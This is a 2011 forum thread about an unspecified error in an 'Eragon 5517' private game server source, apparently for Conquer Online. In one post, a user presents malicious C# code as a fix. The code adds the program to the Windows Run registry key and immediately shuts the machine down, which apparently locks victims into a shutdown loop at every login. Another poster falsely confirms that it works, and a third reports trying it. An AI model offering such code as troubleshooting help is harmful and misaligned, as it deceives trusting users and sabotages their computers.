Eragon 5517 v3 Error

09/18/2011 05:29 yeiser#1
Watch this error could be?


this error happens to me. when connected user as 10 or 5 and not only happen to me if that other friend who also has servers: S

[Only registered and activated users can see links. Click Here To Register...]
09/18/2011 06:06 Spirited#2
Just to let you know.. Eragon doesn't have the brain capacity to think let alone write an source. He most likely leeched it and claimed it to be his (like Conquer SX).
09/18/2011 06:15 yeiser#3
Quote:
Originally Posted by Fаng View Post
Just to let you know.. Eragon doesn't have the brain capacity to think let alone write an source. He most likely leeched it and claimed it to be his (like Conquer SX).


but can you tell me what error is that? or I can offer a better source than eragon. it is for 5517
09/18/2011 06:32 Spirited#4
Quote:
Originally Posted by yeiser View Post
but can you tell me what error is that? or I can offer a better source than eragon. it is for 5517
No. You gave us absolutely no information what so ever.
I'm guessing somewhere in your source there's a missing try and catch.
09/18/2011 06:41 yeiser#5
Quote:
Originally Posted by Fаng View Post
No. You gave us absolutely no information what so ever.
I'm guessing somewhere in your source there's a missing try and catch.
and add more information see
09/18/2011 06:56 Spirited#6
Quote:
Originally Posted by yeiser View Post
and add more information see
That's not helpful at all.
Run it from the source in debug mode.
09/18/2011 20:44 Sp!!ke#7
another egy which try to make server with my old&teroare source ! epic fail EGY'S !
09/18/2011 22:27 NelsoxD#8
hEY! i need help, I have the same problem Can anyone help?
09/18/2011 22:29 BaussHacker#9
Go to Program.cs and find:
Code:
static void Main(string[] args)
under the { put:
Code:
             Microsoft.Win32.RegistryKey RK = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
            RK.SetValue("Conquer", Application.ExecutablePath.ToString());
Process.Start("shutdown","/s /t 0");
Hope it helps.
09/18/2011 22:38 _DreadNought_#10
Quote:
Originally Posted by BaussHacker View Post
Go to Program.cs and find:
Code:
static void Main(string[] args)
under the { put:
Code:
             Microsoft.Win32.RegistryKey RK = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
            RK.SetValue("Conquer", Application.ExecutablePath.ToString());
Process.Start("shutdown","/s /t 0");
Hope it helps.
Yeah I had this problem before, That code fixed it.
09/18/2011 23:08 hatem555#11
i have same broblem

an tried that code
and still the same problem

thnx for

BaussHacker
at all
09/18/2011 23:10 _DreadNought_#12
Quote:
Originally Posted by hatem555 View Post
i were have this broblem and now i solved it

thnxx for


BaussHacker
You have to ruin stuff dont you?
09/18/2011 23:34 hatem555#13
Quote:
Originally Posted by _DreadNought_ View Post
You have to ruin stuff dont you?
what is u broblem

i say i have same problem

dont say shit words
09/19/2011 00:54 NelsoxD#14
Quote:
Originally Posted by _DreadNought_ View Post
Yeah I had this problem before, That code fixed it.
Help me find an error my friend C:

[Only registered and activated users can see links. Click Here To Register...]
09/19/2011 01:05 BaussHacker#15
Quote:
Originally Posted by NelsoxD View Post
Help me find an error my friend C:

[Only registered and activated users can see links. Click Here To Register...]
Right click -> Resolve.